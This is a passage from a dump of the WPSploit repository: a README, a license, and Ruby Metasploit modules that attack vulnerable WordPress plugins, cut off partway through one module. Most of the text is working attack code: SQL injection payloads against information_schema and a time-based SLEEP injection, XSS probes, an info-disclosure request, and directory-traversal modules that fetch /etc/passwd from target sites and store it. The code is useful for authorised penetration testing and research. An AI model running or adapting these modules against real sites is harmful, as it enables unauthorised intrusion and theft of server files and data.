├── documentation ├── images │ ├── wp_eshop_xss_scanner.png │ ├── wp_ninja_forms_xss_scanner.png │ ├── wp_thecartpress_xss_scanner.png │ ├── wp_database_sync_xss_scanner.png │ ├── wp_youtube_embed_xss_scanner.png │ └── wp_visual_form_builder_xss_scanner.jpg ├── auxiliary │ ├── wp_aprils_super_function_xss_scanner.md │ ├── wp_business_intelligent_sqli_scanner.md │ ├── wp_visual_form_builder_xss_scanner.md │ ├── wp_eshop_xss_scanner.md │ ├── wp_social_media_and_share_xss_scanner.md │ ├── wp_ninja_forms_xss_scanner.md │ ├── wp_database_sync_xss_scanner.md │ ├── wp_thecartpress_xss_scanner.md │ └── wp_gimedia_library_file_read.md └── exploits │ ├── wp_reflexgallery_file_upload.md │ ├── wp_creativecontactform_file_upload.md │ ├── wp_worktheflow_file_upload.md │ ├── wp_showbizpro_file_upload.md │ ├── wp_inboundio_marketing_file_upload.md │ ├── wp_wpshop_ecommerce_file_upload.md │ ├── wp_xerteonline_file_upload.md │ ├── wp_nmediawebsite_file_upload.md │ ├── wp_woopra_analytics_file_upload.md │ ├── wp_business_intelligence_file_upload.md │ ├── wp_frontend_editor_file_upload.md │ ├── wp_ultimate_product_catalogue_file_upload.md │ ├── wp_woocommerce_file_upload.md │ ├── wp_slideshowgallery_file_upload.md │ └── wp_acf_frontend_display_file_upload.md ├── LICENSE ├── README.md └── modules ├── auxiliary ├── scanner │ └── http │ │ ├── wp_mashshare_info_disclosure.rb │ │ ├── wp_store_locator_sqli.rb │ │ ├── wp_spreadsheet_xss_scanner.rb │ │ ├── wp_aprils_super_function_xss_scanner.rb │ │ ├── wp_ibs_mappro_file_read.rb │ │ ├── wp_attachment_export_file_download.rb │ │ ├── wp_business_intelligent_sqli_scanner.rb │ │ ├── wp_dukapress_file_read.rb │ │ ├── wp_mobileedition_file_read.rb │ │ ├── wp_ecommerce_shop_styling_file_read.rb │ │ ├── wp_gimedia_library_file_read.rb │ │ ├── wp_source_control_file_read.rb │ │ ├── wp_really_simple_guest_post_file_read.rb │ │ ├── wp_paypal_currency_converter_basic_for_woocommerce_file_read.rb │ │ ├── wp_se_html5_album_audioplayer_file_read.rb │ │ ├── wp_mobile_pack_info_disclosure.rb │ │ ├── wp_ninja_forms_xss_scanner.rb │ │ ├── wp_database_sync_xss_scanner.rb │ │ ├── wp_visual_form_builder_xss_scanner.rb │ │ ├── wp_font_file_read.rb │ │ ├── wp_elisqlreports_file_read.rb │ │ ├── wp_thecartpress_xss_scanner.rb │ │ ├── wp_cp_image_storage_file_read.rb │ │ ├── wp_eshop_xss_scanner.rb │ │ └── wp_social_media_and_share_xss_scanner.rb └── dos │ └── http │ └── wp_bulk_delete_dos.rb └── exploits └── unix └── webapp ├── wp_woopra_analytics_file_upload.rb ├── wp_creativecontactform_file_upload.rb ├── wp_inboundio_marketing_file_upload.rb ├── wp_wpshop_ecommerce_file_upload.rb ├── wp_business_intelligence_file_upload.rb ├── wp_ultimate_product_catalogue_file_upload.rb ├── wp_xerteonline_file_upload.rb ├── wp_worktheflow_file_upload.rb ├── wp_reflexgallery_file_upload.rb ├── wp_nmediawebsite_file_upload.rb ├── wp_acf_frontend_display_file_upload.rb ├── wp_woocommerce_file_upload.rb ├── wp_showbiz_file_upload.rb ├── wp_ajax_load_more_file_upload.rb └── wp_slideshowgallery_file_upload.rb /documentation/images/wp_eshop_xss_scanner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_eshop_xss_scanner.png -------------------------------------------------------------------------------- /documentation/images/wp_ninja_forms_xss_scanner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_ninja_forms_xss_scanner.png -------------------------------------------------------------------------------- /documentation/images/wp_thecartpress_xss_scanner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_thecartpress_xss_scanner.png -------------------------------------------------------------------------------- /documentation/images/wp_database_sync_xss_scanner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_database_sync_xss_scanner.png -------------------------------------------------------------------------------- /documentation/images/wp_youtube_embed_xss_scanner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_youtube_embed_xss_scanner.png -------------------------------------------------------------------------------- /documentation/images/wp_visual_form_builder_xss_scanner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_visual_form_builder_xss_scanner.jpg -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 Roberto Soares 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## WPSploit 2 | 3 | #### WPSploit - Exploiting WordPress With Metasploit. 4 | 5 | This repository is designed for creating and/or porting of specific exploits 6 | for WordPress using metasploit as exploitation tool. 7 | 8 | ##### Currently:
9 | 44 modules (15 exploits and 29 auxiliaries) 10 | 11 | ##### Usage:
12 | For the use of these modules, you can download them to the directory: 13 | ``` 14 | # cd /tmp 15 | # git clone https://github.com/espreto/wpsploit 16 | # mv wpsploit/modules/auxiliary/ ~/.msf4/modules/ 17 | # mv wpsploit/modules/exploits/ ~/.msf4/modules/ 18 | # msfconsole 19 | or 20 | # cd /path/to/msf 21 | # ./msfconsole 22 | ``` 23 | For details, check the official documentation of metasploit talking about ["Loading External Modules"](https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules).
24 | All modules will be created based on [WPScan Vulnerability Database - WPVDB] (https://wpvulndb.com/).

25 | 26 | The public GitHub source repository can be found at:
27 | https://github.com/espreto/wpsploit

28 | 29 | Questions and suggestions can be sent to:
30 | robertoespreto[at]gmail.com

31 | 32 | ##### Mentioned in a blog post by Rapid7/Metasploit: ["WordPress Exploitation Extravaganza"](https://community.rapid7.com/community/metasploit/blog/2015/06/05/weekly-metasploit-wrapup-and-were-back). 33 | 34 | 35 | Contributing 36 | -- 37 | 1. Fork it 38 | 2. Create your feature branch (```git checkout -b my-new-feature```) 39 | 3. Commit your changes (```git commit -am 'Add some feature'```) 40 | 4. Push to the branch (```git push origin my-new-feature```) 41 | 5. Create new Pull Request 42 | 43 | To Do: 44 | -- 45 | Missing some features, but it's a start. 46 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_mashshare_info_disclosure.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Mashshare Plugin Info Disclosure', 17 | 'Description' => %q{ 18 | This module attempts to exploit a information disclosure in Mashshare for WordPress, 19 | version 2.3.0 and likely prior in order if the instance is vulnerable. 20 | }, 21 | 'Author' => 22 | [ 23 | 'James Hooker', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['OSVDB', '120988'], 30 | ['WPVDB', '7936'], 31 | ['URL', 'https://research.g0blin.co.uk/g0blin-00045/'] 32 | ], 33 | 'DisclosureDate' => 'Apr 25 2015' 34 | )) 35 | end 36 | 37 | def check 38 | check_plugin_version_from_readme('mashsharer', '2.3.1') 39 | end 40 | 41 | def run_host(ip) 42 | 43 | res = send_request_cgi( 44 | 'uri' => normalize_uri(wordpress_url_admin_ajax), 45 | 'vars_get' => { 46 | 'action' => '-', 47 | 'mashsb-action' => 'tools_tab_system_info' 48 | } 49 | ) 50 | 51 | unless res && res.body 52 | print_error("#{peer} - Server did not respond in an expected way") 53 | return 54 | end 55 | 56 | if res.code == 200 && res.body.include?('Site Info') 57 | print_good("#{peer} - Vulnerable to Information Disclosure the \"ViperGB 1.3.10\" plugin for WordPress") 58 | vprint_good("Information Disclosure: #{res.body}") 59 | p = store_loot('wp_mashshare', 'text/html', ip, res.body, 'tools_tab_system_info') 60 | print_good("Save in: #{p}") 61 | else 62 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 63 | end 64 | end 65 | end 66 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_store_locator_sqli.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Store Locator Unauthenticated SQL Injection Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a SQL injection in Store Locator in version 19 | 2.3-3.11 and likely prior in order if the instance is vulnerable. 20 | }, 21 | 'Author' => 22 | [ 23 | 'g0blin', # Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | [ 'CVE', '2014-8621'], 30 | [ 'WPVDB', '8241' ] 31 | ], 32 | 'DisclosureDate' => 'Nov 05 2014' 33 | )) 34 | end 35 | 36 | def check 37 | check_plugin_version_from_readme('store-locator', '3.12') 38 | end 39 | 40 | def run_host(ip) 41 | flag = Rex::Text.rand_text_alpha(5) 42 | # TODO: Change the SQL injection to greater coverage 43 | sqli = ", information_schema.tables.table_name as #{flag} FROM wp_store_locator LEFT JOIN information_schema.tables ON 1=1--" 44 | vprint_status("#{peer} - Checking host") 45 | 46 | res = send_request_cgi( 47 | 'uri' => normalize_uri(wordpress_url_plugins, 'store-locator', 'sl-xml.php'), 48 | 'vars_get' => { 49 | 'sl_xml_customns[]' => flag, 50 | 'sl_custom_fields' => sqli 51 | } 52 | ) 53 | 54 | if res && res.body && res.body.include?('marker') 55 | print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Store Locator") 56 | vprint_line("#{res.body}") 57 | 58 | path = store_loot( 59 | 'storelocator.file', 60 | 'text/plain', 61 | ip, 62 | res.body 63 | ) 64 | print_good("#{peer} - File saved in: #{path}") 65 | else 66 | print_error("#{peer} - Server did not respond in an expected way") 67 | end 68 | end 69 | end 70 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_spreadsheet_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Spreadsheet Plugin XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a Cross-Site Scripting in Spreadsheet for WordPress, 19 | version 2.0 and likely prior in order if the instance is vulnerable. 20 | }, 21 | 'Author' => 22 | [ 23 | 'ACC3SS', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['CVE', '2013-6281'], 30 | ['OSVDB', '98831'], 31 | ['WPVDB', '6980'], 32 | ['URL', 'http://packetstormsecurity.com/files/123699/'] 33 | ], 34 | 'DisclosureDate' => 'Oct 18 2013' 35 | )) 36 | end 37 | 38 | def check 39 | check_plugin_version_from_readme('dhtmlxspreadsheet', '2.1') 40 | end 41 | 42 | def run_host(ip) 43 | xss = Rex::Text.rand_text_alpha(8) 44 | 45 | res = send_request_cgi( 46 | 'uri' => normalize_uri(wordpress_url_plugins, 'dhtmlxspreadsheet', 'codebase', 'spreadsheet.php'), 47 | 'vars_get' => { 48 | 'page' => "\"'>" 49 | } 50 | ) 51 | 52 | unless res && res.body 53 | print_error("#{peer} - Server did not respond in an expected way") 54 | return 55 | end 56 | 57 | if res.code == 200 && res.body =~ /#{xss}/ 58 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"SPreadsheet Plugion 2.0\" plugin for WordPress") 59 | report_vuln( 60 | host: rhost, 61 | port: rport, 62 | proto: 'tcp', 63 | name: 'Cross-Site Scripting in Spreadsheet Plugin 2.0 for WordPress', 64 | refs: references 65 | ) 66 | else 67 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 68 | end 69 | end 70 | end 71 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_aprils_super_function_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress April\'s Super Function Pack XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a Cross-Site Scripting in April's Super Function 19 | Pack Plugin for WordPress, version 1.4.7 and likely prior in order if the instance is 20 | vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Unknown', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2014-100026'], 31 | ['OSVDB', '101807'], 32 | ['WPVDB', '7068'] 33 | ], 34 | 'DisclosureDate' => 'Jan 06 2014' 35 | )) 36 | end 37 | 38 | def check 39 | check_plugin_version_from_readme('aprils-super-functions-pack', '1.4.8') 40 | end 41 | 42 | def run_host(ip) 43 | xss = Rex::Text.rand_text_alpha(8) 44 | 45 | res = send_request_cgi( 46 | 'uri' => normalize_uri(wordpress_url_plugins, 'aprils-super-functions-pack', 'readme.php'), 47 | 'vars_get' => { 48 | 'page' => "\"'>" 49 | } 50 | ) 51 | 52 | unless res && res.body 53 | print_error("#{peer} - Server did not respond in an expected way") 54 | return 55 | end 56 | 57 | if res.code == 200 && res.body =~ /#{xss}/ 58 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"April's Super Function Pack 1.4.7\" plugin for WordPress") 59 | report_vuln( 60 | host: rhost, 61 | port: rport, 62 | proto: 'tcp', 63 | name: 'Cross-Site Scripting in April\'s Super Function Pack 1.4.7 for WordPress', 64 | refs: references 65 | ) 66 | else 67 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 68 | end 69 | end 70 | end 71 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_ibs_mappro_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress IBS Mappro File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "WP IBS Mappro" version 0.6, allowing to read arbitrary files with the 20 | web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['CVE', '2015-5472'], 25 | ['WPVDB', '8091'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Larry W. Cashdollar', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']) 38 | ], self.class) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('ibs-mappro', '1.0') 43 | end 44 | 45 | def run_host(ip) 46 | filename = datastore['FILEPATH'] 47 | filename = filename[1, filename.length] if filename =~ /^\/\// 48 | 49 | res = send_request_cgi({ 50 | 'method' => 'GET', 51 | 'uri' => normalize_uri(wordpress_url_plugins, 'ibs-mappro', 'lib', 'download.php'), 52 | 'vars_get' => 53 | { 54 | 'file' => "#{filename}" 55 | } 56 | }) 57 | 58 | if res && res.code == 200 && res.body.length > 0 59 | 60 | vprint_status('Downloading file...') 61 | vprint_line("\n#{res.body}") 62 | 63 | fname = datastore['FILEPATH'] 64 | 65 | path = store_loot( 66 | 'ibsmappro.traversal', 67 | 'text/plain', 68 | ip, 69 | res.body, 70 | fname 71 | ) 72 | 73 | print_good("#{peer} - File saved in: #{path}") 74 | else 75 | print_error("#{peer} - Nothing was downloaded. You can try again.") 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_attachment_export_file_download.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Attachment Export File Download Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a vulnerability in WordPress Plugin "WP Attachment Export" 19 | version 0.2.3, allowing to download arbitrary files with the web server privileges. 20 | }, 21 | 'References' => 22 | [ 23 | ['WPVDB', '8103'], 24 | ['URL', 'https://packetstormsecurity.com/files/132693/'] 25 | ], 26 | 'Author' => 27 | [ 28 | 'Nitin Venkatesh', # Vulnerability discovery 29 | 'Roberto Soares Espreto ' # Metasploit module 30 | ], 31 | 'License' => MSF_LICENSE 32 | )) 33 | 34 | register_options( 35 | [ 36 | OptString.new('FILEPATH', [true, 'The path to the file to read', 'wp-attachment-export-download']), 37 | ], self.class) 38 | end 39 | 40 | def check 41 | check_plugin_version_from_readme('wp-attachment-export', '0.2.4') 42 | end 43 | 44 | def run_host(ip) 45 | filename = datastore['FILEPATH'] 46 | filename = filename[1, filename.length] if filename =~ /^\// 47 | 48 | res = send_request_cgi({ 49 | 'method' => 'GET', 50 | 'uri' => normalize_uri(wordpress_url_backend, 'tools.php'), 51 | 'vars_get' => 52 | { 53 | 'content' => "", 54 | "#{filename}" => 'true' 55 | } 56 | }) 57 | 58 | if res && res.code == 200 && res.body.length > 0 59 | 60 | print_status('Downloading file...') 61 | vprint_line("\n#{res.body}") 62 | 63 | fname = datastore['FILEPATH'] 64 | 65 | path = store_loot( 66 | 'attachment-export.download', 67 | 'text/plain', 68 | ip, 69 | res.body, 70 | fname 71 | ) 72 | 73 | print_good("#{peer} - File saved in: #{path}") 74 | else 75 | print_error("#{peer} - Nothing was downloaded. You can try again.") 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_business_intelligent_sqli_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Business Inteligence Lite SQLi Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit SQL injection in Business Intelligence 19 | Lite version 1.6.1 for WordPress and likely prior in order if the instance 20 | is vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Jagriti Sahu', # Vulnerability Discovery - Correct? 25 | 'Roberto Soares Espreto' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['WPVDB', '7879'], 31 | ['URL', 'http://packetstormsecurity.com/files/131228/'] 32 | ], 33 | 'DisclosureDate' => 'Apr 01 2015' 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptInt.new('SLEEP', [true, 'Calculate the response time (default: 7)', 7]) 39 | ] 40 | ) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('wp-business-intelligence-lite', '1.6.2') 45 | end 46 | 47 | def run_host(ip) 48 | start_time = Time.now 49 | timeout = datastore['SLEEP'] 50 | 51 | print_status("#{peer} - Checking host...") 52 | 53 | res = send_request_cgi( 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'view.php'), 55 | 'vars_get' => { 56 | 't' => "1 AND (SELECT * FROM (SELECT(SLEEP(#{timeout})))iqPT)" 57 | } 58 | ) 59 | 60 | end_time = Time.now - start_time 61 | 62 | unless res && res.body 63 | vprint_error("#{peer} - Server did not respond in an expected way") 64 | return 65 | end 66 | 67 | if res.code == 200 && end_time >= timeout 68 | print_good("#{peer} - Vulnerable to Unauth SQL Injection in \"Business Intelligence Lite 1.6.1\" plugin for WordPress") 69 | report_vuln( 70 | host: rhost, 71 | port: rport, 72 | proto: 'tcp', 73 | name: 'Unauth SQLi in Business Intelligence Lite 1.6.1 for WordPress', 74 | refs: references 75 | ) 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_dukapress_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress DukaPress Plugin File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "DukaPress" version 2.5.2, allowing to read arbitrary files with the 20 | web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '35346'], 25 | ['CVE', '2014-8799'], 26 | ['WPVDB', '7731'], 27 | ['OSVDB', '115130'] 28 | ], 29 | 'Author' => 30 | [ 31 | 'Kacper Szurek', # Vulnerability discovery 32 | 'Roberto Soares Espreto ' # Metasploit module 33 | ], 34 | 'License' => MSF_LICENSE 35 | )) 36 | 37 | register_options( 38 | [ 39 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 40 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) 41 | ], self.class) 42 | end 43 | 44 | def check 45 | check_plugin_from_readme('dukapress', '2.5.7') 46 | end 47 | def run_host(ip) 48 | traversal = "../" * datastore['DEPTH'] 49 | filename = datastore['FILEPATH'] 50 | filename = filename[1, filename.length] if filename =~ /^\// 51 | 52 | res = send_request_cgi({ 53 | 'method' => 'GET', 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'), 55 | 'vars_get' => 56 | { 57 | 'src' => "#{traversal}#{filename}" 58 | } 59 | }) 60 | 61 | if res && res.code == 200 && res.body.length > 0 62 | 63 | print_status('Downloading file...') 64 | print_line("\n#{res.body}") 65 | 66 | fname = datastore['FILEPATH'] 67 | 68 | path = store_loot( 69 | 'dukapress.file', 70 | 'text/plain', 71 | ip, 72 | res.body, 73 | fname 74 | ) 75 | 76 | print_good("#{peer} - File saved in: #{path}") 77 | else 78 | print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") 79 | end 80 | end 81 | end 82 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Mobile Edition File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "WP Mobile Edition" version 2.2.7, allowing to read arbitrary files with the 20 | web server privileges. Stay tuned to the correct value in TARGETURI. 21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '36733'], 25 | ['WPVDB', '7898'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Khwanchai Kaewyos', # Vulnerability discovery 30 | 'Roberto Soares Espreto ' # Metasploit module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]), 38 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('wp-mobile-edition', '2.3') 44 | end 45 | 46 | def run_host(ip) 47 | traversal = "../" * datastore['DEPTH'] 48 | filename = datastore['FILEPATH'] 49 | filename = filename[1, filename.length] if filename =~ /^\// 50 | 51 | res = send_request_cgi({ 52 | 'method' => 'GET', 53 | 'uri' => normalize_uri(wordpress_url_themes, 'mTheme-Unus', 'css', 'css.php'), 54 | 'vars_get' => 55 | { 56 | 'files' => "#{traversal}#{filename}" 57 | } 58 | }) 59 | 60 | if res && res.code == 200 && res.body.length > 0 61 | 62 | print_status('Downloading file...') 63 | print_line("\n#{res.body}\n") 64 | 65 | fname = datastore['FILEPATH'] 66 | 67 | path = store_loot( 68 | 'mobileedition.traversal', 69 | 'text/plain', 70 | ip, 71 | res.body, 72 | fname 73 | ) 74 | 75 | print_good("#{peer} - File saved in: #{path}") 76 | else 77 | print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_ecommerce_shop_styling_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress eCommerce Shop Styling File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "eCommerce Shop Styling", allowing to read arbitrary files with the web server 20 | privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8079'], 25 | ['URL', 'http://www.vapid.dhs.org/advisory.php?v=136'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Larry W. Cashdollar', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 38 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ]) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('wp-ecommerce-shop-styling', '2.6') 44 | end 45 | 46 | def run_host(ip) 47 | traversal = "../" * datastore['DEPTH'] 48 | filename = datastore['FILEPATH'] 49 | filename = filename[1, filename.length] if filename =~ /^\// 50 | 51 | res = send_request_cgi( 52 | 'method' => 'GET', 53 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp-ecommerce-shop-styling', 'includes', 'download.php'), 54 | 'vars_get' => 55 | { 56 | 'filename' => "#{traversal}#{filename}" 57 | } 58 | ) 59 | 60 | if res && res.code == 200 && res.body.length > 0 61 | 62 | vprint_status('Downloading file...') 63 | 